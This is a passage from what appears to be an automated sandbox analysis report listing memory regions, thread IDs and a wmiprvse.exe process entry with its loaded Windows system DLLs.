	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 2985
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 2986
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 2987
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 2988
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 2989
	        start_va = 0x7ff95ae60000
	          end_va = 0x7ff95ae67fff
	       monitored = 0
	     entry_point = 0x7ff95ae61ea0
	     region_type = mapped_file
	            name = "nsi.dll"
	        filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")

Region:
	              id = 2990
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 2991
	        start_va = 0x1808a6c0000
	          end_va = 0x1808a6c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001808a6c0000"
	        filename = ""

Region:
	              id = 3194
	        start_va = 0x1808a6c0000
	          end_va = 0x1808a6ccfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001808a6c0000"
	        filename = ""

Region:
	              id = 3225
	        start_va = 0x1808a6c0000
	          end_va = 0x1808a6c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001808a6c0000"
	        filename = ""

Region:
	              id = 3236
	        start_va = 0xf66a80000
	          end_va = 0xf66b7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f66a80000"
	        filename = ""

Region:
	              id = 3246
	        start_va = 0xf66b80000
	          end_va = 0xf66c7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f66b80000"
	        filename = ""

Region:
	              id = 3247
	        start_va = 0xf66c80000
	          end_va = 0xf66d7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f66c80000"
	        filename = ""

Region:
	              id = 3248
	        start_va = 0xf66d80000
	          end_va = 0xf66e7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f66d80000"
	        filename = ""

Region:
	              id = 3524
	        start_va = 0x1808a6c0000
	          end_va = 0x1808a6c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001808a6c0000"
	        filename = ""

Region:
	              id = 3899
	        start_va = 0x1808a6c0000
	          end_va = 0x1808a6c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001808a6c0000"
	        filename = ""

Region:
	              id = 4027
	        start_va = 0xf66e80000
	          end_va = 0xf66f7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f66e80000"
	        filename = ""

Region:
	              id = 4097
	        start_va = 0x1808a6c0000
	          end_va = 0x1808a6c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001808a6c0000"
	        filename = ""

Region:
	              id = 4127
	        start_va = 0xf66f80000
	          end_va = 0xf6707ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f66f80000"
	        filename = ""

Region:
	              id = 4331
	        start_va = 0xf67080000
	          end_va = 0xf6717ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f67080000"
	        filename = ""

Region:
	              id = 4453
	        start_va = 0x1808a6c0000
	          end_va = 0x1808a6c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001808a6c0000"
	        filename = ""

Region:
	              id = 4526
	        start_va = 0x1808a6c0000
	          end_va = 0x1808a6c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001808a6c0000"
	        filename = ""

Region:
	              id = 4788
	        start_va = 0x1808a6c0000
	          end_va = 0x1808a6c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001808a6c0000"
	        filename = ""

Region:
	              id = 4997
	        start_va = 0x1808a6c0000
	          end_va = 0x1808a6c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001808a6c0000"
	        filename = ""

Region:
	              id = 5412
	        start_va = 0x1808a6c0000
	          end_va = 0x1808a6c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001808a6c0000"
	        filename = ""

Region:
	              id = 5703
	        start_va = 0x1808a6c0000
	          end_va = 0x1808a6c1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001808a6c0000"
	        filename = ""

Region:
	              id = 5778
	        start_va = 0x1808a6c0000
	          end_va = 0x1808a6c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001808a6c0000"
	        filename = ""

Region:
	              id = 5977
	        start_va = 0x1808a6c0000
	          end_va = 0x1808a6c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001808a6c0000"
	        filename = ""


Thread:
	id = 137
	os_tid = 0x11e4


Thread:
	id = 138
	os_tid = 0x135c


Thread:
	id = 139
	os_tid = 0x1138


Thread:
	id = 140
	os_tid = 0x10e8


Thread:
	id = 141
	os_tid = 0x10b4


Thread:
	id = 142
	os_tid = 0xb84


Thread:
	id = 143
	os_tid = 0x648


Thread:
	id = 144
	os_tid = 0x4e0


Thread:
	id = 145
	os_tid = 0x1d0


Thread:
	id = 146
	os_tid = 0x684


Thread:
	id = 147
	os_tid = 0x3ac


Thread:
	id = 148
	os_tid = 0x4b8


Thread:
	id = 149
	os_tid = 0x404


Thread:
	id = 150
	os_tid = 0x5f0


Thread:
	id = 151
	os_tid = 0x874


Thread:
	id = 152
	os_tid = 0x868


Thread:
	id = 153
	os_tid = 0x71c


Thread:
	id = 154
	os_tid = 0x858


Thread:
	id = 155
	os_tid = 0x79c


Thread:
	id = 156
	os_tid = 0x7b0


Thread:
	id = 157
	os_tid = 0x5ec


Thread:
	id = 158
	os_tid = 0x38c


Thread:
	id = 159
	os_tid = 0xa80


Thread:
	id = 160
	os_tid = 0x388


Thread:
	id = 161
	os_tid = 0x210


Thread:
	id = 162
	os_tid = 0x6f0


Thread:
	id = 163
	os_tid = 0x1c4


Thread:
	id = 164
	os_tid = 0x254


Thread:
	id = 165
	os_tid = 0x350


Thread:
	id = 166
	os_tid = 0x2e8


Thread:
	id = 167
	os_tid = 0x34c


Thread:
	id = 168
	os_tid = 0xaf4


Thread:
	id = 169
	os_tid = 0xbfc


Thread:
	id = 170
	os_tid = 0x9d4


Thread:
	id = 171
	os_tid = 0x94c


Thread:
	id = 172
	os_tid = 0xbcc


Thread:
	id = 173
	os_tid = 0xa30


Thread:
	id = 174
	os_tid = 0xb90


Thread:
	id = 175
	os_tid = 0x58c


Thread:
	id = 176
	os_tid = 0x55c


Thread:
	id = 177
	os_tid = 0xaa0


Thread:
	id = 178
	os_tid = 0x8a0


Thread:
	id = 179
	os_tid = 0x844


Thread:
	id = 180
	os_tid = 0x8b4


Thread:
	id = 181
	os_tid = 0x60


Thread:
	id = 182
	os_tid = 0x398


Thread:
	id = 183
	os_tid = 0x234


Thread:
	id = 184
	os_tid = 0x83c


Thread:
	id = 185
	os_tid = 0xa64


Thread:
	id = 186
	os_tid = 0xa44


Thread:
	id = 187
	os_tid = 0x89c


Thread:
	id = 188
	os_tid = 0x440


Thread:
	id = 189
	os_tid = 0x88c


Thread:
	id = 190
	os_tid = 0x830


Thread:
	id = 191
	os_tid = 0x680


Thread:
	id = 192
	os_tid = 0x67c


Thread:
	id = 193
	os_tid = 0x4a4


Thread:
	id = 194
	os_tid = 0x774


Thread:
	id = 195
	os_tid = 0x700


Thread:
	id = 196
	os_tid = 0x6e0


Thread:
	id = 197
	os_tid = 0x664


Thread:
	id = 198
	os_tid = 0x668


Thread:
	id = 199
	os_tid = 0x428


Thread:
	id = 200
	os_tid = 0x7f4


Thread:
	id = 201
	os_tid = 0x7c8


Thread:
	id = 202
	os_tid = 0x7b4


Thread:
	id = 203
	os_tid = 0x7ac


Thread:
	id = 204
	os_tid = 0x784


Thread:
	id = 205
	os_tid = 0x780


Thread:
	id = 206
	os_tid = 0x74c


Thread:
	id = 207
	os_tid = 0x704


Thread:
	id = 208
	os_tid = 0x6ec


Thread:
	id = 209
	os_tid = 0x578


Thread:
	id = 210
	os_tid = 0x504


Thread:
	id = 211
	os_tid = 0x4fc


Thread:
	id = 212
	os_tid = 0x478


Thread:
	id = 213
	os_tid = 0x44c


Thread:
	id = 214
	os_tid = 0x3b4


Thread:
	id = 215
	os_tid = 0x170


Thread:
	id = 216
	os_tid = 0x264


Thread:
	id = 217
	os_tid = 0x150


Thread:
	id = 218
	os_tid = 0x14c


Thread:
	id = 219
	os_tid = 0x12c


Thread:
	id = 220
	os_tid = 0x128


Thread:
	id = 221
	os_tid = 0xfc


Thread:
	id = 222
	os_tid = 0x3f0


Thread:
	id = 223
	os_tid = 0x3e4


Thread:
	id = 224
	os_tid = 0x368


Thread:
	id = 260
	os_tid = 0xc68


Thread:
	id = 262
	os_tid = 0xc70


Thread:
	id = 263
	os_tid = 0xc74


Thread:
	id = 264
	os_tid = 0xc78


Thread:
	id = 314
	os_tid = 0x5c8


Thread:
	id = 319
	os_tid = 0xce4


Thread:
	id = 329
	os_tid = 0x848


Process:
	id = "38"
	image_name = "wmiprvse.exe"
	filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
	page_root = "0x5f3d5000"
	os_pid = "0x1110"
	os_integrity_level = "0x4000"
	os_privileges = "0x60800000"
	monitor_reason = "rpc_server"
	parent_id = "37"
	os_parent_pid = "0x274"
	cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\Network Service"
	bitness = "32"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00051a48" [0xc000000f]

Region:
	              id = 4178
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 4179
	        start_va = 0xed64340000
	          end_va = 0xed643bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000ed64340000"
	        filename = ""

Region:
	              id = 4180
	        start_va = 0xed64400000
	          end_va = 0xed645fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000ed64400000"
	        filename = ""

Region:
	              id = 4181
	        start_va = 0xed64680000
	          end_va = 0xed646fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000ed64680000"
	        filename = ""

Region:
	              id = 4182
	        start_va = 0xed64700000
	          end_va = 0xed6477ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000ed64700000"
	        filename = ""

Region:
	              id = 4183
	        start_va = 0xed64780000
	          end_va = 0xed647fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000ed64780000"
	        filename = ""

Region:
	              id = 4184
	        start_va = 0xed64800000
	          end_va = 0xed6487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000ed64800000"
	        filename = ""

Region:
	              id = 4185
	        start_va = 0xed64880000
	          end_va = 0xed648fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000ed64880000"
	        filename = ""

Region:
	              id = 4186
	        start_va = 0xed64900000
	          end_va = 0xed6497ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000ed64900000"
	        filename = ""

Region:
	              id = 4187
	        start_va = 0xed64980000
	          end_va = 0xed649fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000ed64980000"
	        filename = ""

Region:
	              id = 4188
	        start_va = 0xed64a00000
	          end_va = 0xed64a7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000ed64a00000"
	        filename = ""

Region:
	              id = 4189
	        start_va = 0x1f1b25e0000
	          end_va = 0x1f1b25effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f1b25e0000"
	        filename = ""

Region:
	              id = 4190
	        start_va = 0x1f1b25f0000
	          end_va = 0x1f1b25f6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f1b25f0000"
	        filename = ""

Region:
	              id = 4191
	        start_va = 0x1f1b2600000
	          end_va = 0x1f1b2614fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f1b2600000"
	        filename = ""

Region:
	              id = 4192
	        start_va = 0x1f1b2620000
	          end_va = 0x1f1b2623fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f1b2620000"
	        filename = ""

Region:
	              id = 4193
	        start_va = 0x1f1b2630000
	          end_va = 0x1f1b2630fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f1b2630000"
	        filename = ""

Region:
	              id = 4194
	        start_va = 0x1f1b2640000
	          end_va = 0x1f1b2641fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f1b2640000"
	        filename = ""

Region:
	              id = 4195
	        start_va = 0x1f1b2650000
	          end_va = 0x1f1b270dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4196
	        start_va = 0x1f1b2710000
	          end_va = 0x1f1b2716fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f1b2710000"
	        filename = ""

Region:
	              id = 4197
	        start_va = 0x1f1b2720000
	          end_va = 0x1f1b27dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f1b2720000"
	        filename = ""

Region:
	              id = 4198
	        start_va = 0x1f1b27e0000
	          end_va = 0x1f1b27e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f1b27e0000"
	        filename = ""

Region:
	              id = 4199
	        start_va = 0x1f1b27f0000
	          end_va = 0x1f1b28effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f1b27f0000"
	        filename = ""

Region:
	              id = 4200
	        start_va = 0x1f1b28f0000
	          end_va = 0x1f1b2a77fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f1b28f0000"
	        filename = ""

Region:
	              id = 4201
	        start_va = 0x1f1b2a80000
	          end_va = 0x1f1b2a80fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f1b2a80000"
	        filename = ""

Region:
	              id = 4202
	        start_va = 0x1f1b2a90000
	          end_va = 0x1f1b2a94fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 4203
	        start_va = 0x1f1b2aa0000
	          end_va = 0x1f1b2aaffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f1b2aa0000"
	        filename = ""

Region:
	              id = 4204
	        start_va = 0x1f1b2ab0000
	          end_va = 0x1f1b2de6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 4205
	        start_va = 0x1f1b2df0000
	          end_va = 0x1f1b2f70fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f1b2df0000"
	        filename = ""

Region:
	              id = 4206
	        start_va = 0x1f1b2f80000
	          end_va = 0x1f1b2f80fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f1b2f80000"
	        filename = ""

Region:
	              id = 4207
	        start_va = 0x1f1b2f90000
	          end_va = 0x1f1b308ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f1b2f90000"
	        filename = ""

Region:
	              id = 4208
	        start_va = 0x1f1b3090000
	          end_va = 0x1f1b3090fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f1b3090000"
	        filename = ""

Region:
	              id = 4209
	        start_va = 0x1f1b30a0000
	          end_va = 0x1f1b30a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f1b30a0000"
	        filename = ""

Region:
	              id = 4210
	        start_va = 0x1f1b30b0000
	          end_va = 0x1f1b30b2fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "wmi.dll"
	        filename = "\\Windows\\System32\\wmi.dll" (normalized: "c:\\windows\\system32\\wmi.dll")

Region:
	              id = 4211
	        start_va = 0x1f1b30d0000
	          end_va = 0x1f1b30d2fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "security.dll"
	        filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll")

Region:
	              id = 4212
	        start_va = 0x1f1b30f0000
	          end_va = 0x1f1b31effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f1b30f0000"
	        filename = ""

Region:
	              id = 4213
	        start_va = 0x1f1b31f0000
	          end_va = 0x1f1b31f2fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cimwin32.dll.mui"
	        filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui")

Region:
	              id = 4214
	        start_va = 0x7df5ff540000
	          end_va = 0x7ff5ff53ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff540000"
	        filename = ""

Region:
	              id = 4215
	        start_va = 0x7ff771980000
	          end_va = 0x7ff771a7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff771980000"
	        filename = ""

Region:
	              id = 4216
	        start_va = 0x7ff771a80000
	          end_va = 0x7ff771aa2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff771a80000"
	        filename = ""

Region:
	              id = 4217
	        start_va = 0x7ff771fc0000
	          end_va = 0x7ff77203ffff
	       monitored = 0
	     entry_point = 0x7ff771fd5f50
	     region_type = mapped_file
	            name = "wmiprvse.exe"
	        filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")

Region:
	              id = 4218
	        start_va = 0x7ff943060000
	          end_va = 0x7ff94322efff
	       monitored = 1
	     entry_point = 0x7ff943087df0
	     region_type = mapped_file
	            name = "cimwin32.dll"
	        filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll")

Region:
	              id = 4219
	        start_va = 0x7ff9453b0000
	          end_va = 0x7ff9453bdfff
	       monitored = 0
	     entry_point = 0x7ff9453b1da0
	     region_type = mapped_file
	            name = "winbrand.dll"
	        filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")

Region:
	              id = 4220
	        start_va = 0x7ff947940000
	          end_va = 0x7ff94798dfff
	       monitored = 0
	     entry_point = 0x7ff947951ce0
	     region_type = mapped_file
	            name = "framedynos.dll"
	        filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")

Region:
	              id = 4221
	        start_va = 0x7ff94a380000
	          end_va = 0x7ff94a395fff
	       monitored = 0
	     entry_point = 0x7ff94a3855e0
	     region_type = mapped_file
	            name = "ncobjapi.dll"
	        filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")

Region:
	              id = 4222
	        start_va = 0x7ff94a570000
	          end_va = 0x7ff94a594fff
	       monitored = 0
	     entry_point = 0x7ff94a579900
	     region_type = mapped_file
	            name = "wmiutils.dll"
	        filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")

Region:
	              id = 4223
	        start_va = 0x7ff94a5a0000
	          end_va = 0x7ff94a5b3fff
	       monitored = 0
	     entry_point = 0x7ff94a5a1800
	     region_type = mapped_file
	            name = "wbemsvc.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")

Region:
	              id = 4224
	        start_va = 0x7ff94a5c0000
	          end_va = 0x7ff94a6b5fff
	       monitored = 0
	     entry_point = 0x7ff94a5f9590
	     region_type = mapped_file
	            name = "fastprox.dll"
	        filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")

Region:
	              id = 4225
	        start_va = 0x7ff94b520000
	          end_va = 0x7ff94b545fff
	       monitored = 0
	     entry_point = 0x7ff94b521cf0
	     region_type = mapped_file
	            name = "srvcli.dll"
	        filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")

Region:
	              id = 4226
	        start_va = 0x7ff94ca80000
	          end_va = 0x7ff94ca90fff
	       monitored = 0
	     entry_point = 0x7ff94ca82fc0
	     region_type = mapped_file
	            name = "wbemprox.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")

Region:
	              id = 4227
	        start_va = 0x7ff94d400000
	          end_va = 0x7ff94d40bfff
	       monitored = 0
	     entry_point = 0x7ff94d4035c0
	     region_type = mapped_file
	            name = "secur32.dll"
	        filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")

Region:
	              id = 4228
	        start_va = 0x7ff94e2f0000
	          end_va = 0x7ff94e36efff
	       monitored = 1
	     entry_point = 0x7ff94e307110
	     region_type = mapped_file
	            name = "wbemcomn.dll"
	        filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")

Region:
	              id = 4229
	        start_va = 0x7ff94fa70000
	          end_va = 0x7ff94fa81fff
	       monitored = 0
	     entry_point = 0x7ff94fa73580
	     region_type = mapped_file
	            name = "cscapi.dll"
	        filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")

Region:
	              id = 4230
	        start_va = 0x7ff950b90000
	          end_va = 0x7ff950ba8fff
	       monitored = 0
	     entry_point = 0x7ff950b94520
	     region_type = mapped_file
	            name = "samcli.dll"
	        filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")

Region:
	              id = 4231
	        start_va = 0x7ff950bd0000
	          end_va = 0x7ff950bdafff
	       monitored = 0
	     entry_point = 0x7ff950bd12b0
	     region_type = mapped_file
	            name = "schedcli.dll"
	        filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll")

Region:
	              id = 4232
	        start_va = 0x7ff9534b0000
	          end_va = 0x7ff9534edfff
	       monitored = 0
	     entry_point = 0x7ff9534ba050
	     region_type = mapped_file
	            name = "logoncli.dll"
	        filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")

Region:
	              id = 4233
	        start_va = 0x7ff953750000
	          end_va = 0x7ff953765fff
	       monitored = 0
	     entry_point = 0x7ff953751b60
	     region_type = mapped_file
	            name = "wkscli.dll"
	        filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")

Region:
	              id = 4234
	        start_va = 0x7ff953ae0000
	          end_va = 0x7ff953af0fff
	       monitored = 0
	     entry_point = 0x7ff953ae3320
	     region_type = mapped_file
	            name = "wmiclnt.dll"
	        filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")

Region:
	              id = 4235
	        start_va = 0x7ff954620000
	          end_va = 0x7ff954629fff
	       monitored = 0
	     entry_point = 0x7ff954621660
	     region_type = mapped_file
	            name = "dsrole.dll"
	        filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")

Region:
	              id = 4236
	        start_va = 0x7ff9549b0000
	          end_va = 0x7ff9549c3fff
	       monitored = 0
	     entry_point = 0x7ff9549b1310
	     region_type = mapped_file
	            name = "browcli.dll"
	        filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll")

Region:
	              id = 4237
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 4238
	        start_va = 0x7ff955ed0000
	          end_va = 0x7ff955ef6fff
	       monitored = 0
	     entry_point = 0x7ff955ed7940
	     region_type = mapped_file
	            name = "devobj.dll"
	        filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")

Region:
	              id = 4239
	        start_va = 0x7ff9568a0000
	          end_va = 0x7ff9568abfff
	       monitored = 0
	     entry_point = 0x7ff9568a27e0
	     region_type = mapped_file
	            name = "netutils.dll"
	        filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")

Region:
	              id = 4240
	        start_va = 0x7ff9569e0000
	          end_va = 0x7ff956a59fff
	       monitored = 0
	     entry_point = 0x7ff956a01a50
	     region_type = mapped_file
	            name = "schannel.dll"
	        filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")

Region:
	              id = 4241
	        start_va = 0x7ff957110000
	          end_va = 0x7ff95713cfff
	       monitored = 0
	     entry_point = 0x7ff957129d40
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")

Region:
	              id = 4242
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 4243
	        start_va = 0x7ff957320000
	          end_va = 0x7ff957348fff
	       monitored = 0
	     entry_point = 0x7ff957334530
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")

Region:
	              id = 4244
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 4245
	        start_va = 0x7ff9574c0000
	          end_va = 0x7ff9574cffff
	       monitored = 0
	     entry_point = 0x7ff9574c56e0
	     region_type = mapped_file
	            name = "msasn1.dll"
	        filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")

Region:
	              id = 4246
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 4247
